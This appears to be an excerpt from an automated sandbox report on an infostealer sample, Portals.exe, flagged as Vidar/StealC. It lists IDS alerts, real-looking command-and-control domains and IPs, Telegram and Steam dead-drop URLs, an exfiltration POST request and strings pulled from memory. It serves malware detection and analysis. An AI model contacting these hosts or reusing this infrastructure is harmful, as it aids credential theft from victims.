        Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:49784 -> 94.130.189.58:443
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199829660832
        Source: global trafficHTTP traffic detected: GET /l793oy HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /profiles/76561199829660832 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /l793oy HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=fe3759212eb16e0f84_2484407701162572427
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewIP Address: 23.197.127.21 23.197.127.21
        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49732 -> 116.202.4.223:443
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 116.202.4.223
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.227
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00403850 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,1_2_00403850
        Source: global trafficHTTP traffic detected: GET /l793oy HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /profiles/76561199829660832 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /l793oy HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=fe3759212eb16e0f84_2484407701162572427
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0Host: b.b.goldenloafuae.comConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0BCOipzgEIydHOAQi+1c4BCIHWzgEIwNjOAQjI3M4BCIrgzgEIruTOAQiL5c4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0BCOipzgEIydHOAQi+1c4BCIHWzgEIwNjOAQjI3M4BCIrgzgEIruTOAQiL5c4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000003.1842157625.0000322C01500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
        Source: chrome.exe, 0000000D.00000003.1842157625.0000322C01500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
        Source: Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000002.1920575603.0000322C006B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: t.me
        Source: global trafficDNS traffic detected: DNS query: b.b.goldenloafuae.com
        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----yukn7900rqq1v3wlfk6fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0Host: b.b.goldenloafuae.comContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
        Source: chrome.exe, 0000000D.00000002.1921160880.0000322C00866000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
        Source: chrome.exe, 0000000D.00000003.1841148367.0000322C01072000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1925308799.0000322C01072000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
        Source: chrome.exe, 0000000D.00000002.1918127764.0000322C000A7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://google.com/
        Source: chrome.exe, 0000000D.00000002.1923313597.0000322C00E68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
        Source: chrome.exe, 0000000D.00000002.1923013923.0000322C00DA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
        Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
        Source: chrome.exe, 0000000D.00000002.1923169099.0000322C00DEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
        Source: chrome.exe, 0000000D.00000002.1904595328.00000262BEDB0000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
        Source: 76561199829660832[1].htm.1.drString found in binary or memory: https://116.202.4.223
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.4.223/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://116.202.4.223/vlN$
        Source: iekxl6.1.drString found in binary or memory: https://ac.ecosia.org?q=
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.1917953884.0000322C00030000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
        Source: chrome.exe, 0000000D.00000002.1924219364.0000322C00F70000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920607852.0000322C00720000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931608134.0000322C017E8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1926228200.0000322C0110C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
        Source: chrome.exe, 0000000D.00000002.1918016966.0000322C0005C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
        Source: chrome.exe, 0000000D.00000002.1920607852.0000322C00720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
        Source: chrome.exe, 0000000D.00000002.1931608134.0000322C017E8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.comjagi
        Source: Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
        Source: chrome.exe, 0000000D.00000002.1932508840.0000322C01AAC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932426735.0000322C01A68000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930277126.0000322C01494000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: 76561199829660832[1].htm.1.drString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2199005147.0000000003CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.b.goldenloafuae.com
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.b.goldenloafuae.com/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.b.goldenloafuae.com/AS
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.b.goldenloafuae.com/HS
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.b.goldenloafuae.com/OzGS%
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.b.goldenloafuae.com/lGY%%
        Source: Portals.exe, 00000001.00000002.2199005147.0000000003CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.b.goldenloafuae.comKJ
        Source: chrome.exe, 0000000D.00000002.1921596827.0000322C0093C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
        Source: Portals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
        Source: Portals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
        Source: chrome.exe, 0000000D.00000003.1872712918.0000322C01520000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930235650.0000322C01484000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930507532.0000322C01500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com
        Source: chrome.exe, 0000000D.00000002.1922744575.0000322C00CA0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922271085.0000322C00B0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930185486.0000322C01450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
        Source: iekxl6.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
        Source: Portals.exe, 00000001.00000002.2199617855.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922960977.0000322C00D80000.00000004.00001000.00020000.00000000.sdmp, iekxl6.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: Portals.exe, 00000001.00000002.2199617855.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922960977.0000322C00D80000.00000004.00001000.00020000.00000000.sdmp, iekxl6.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
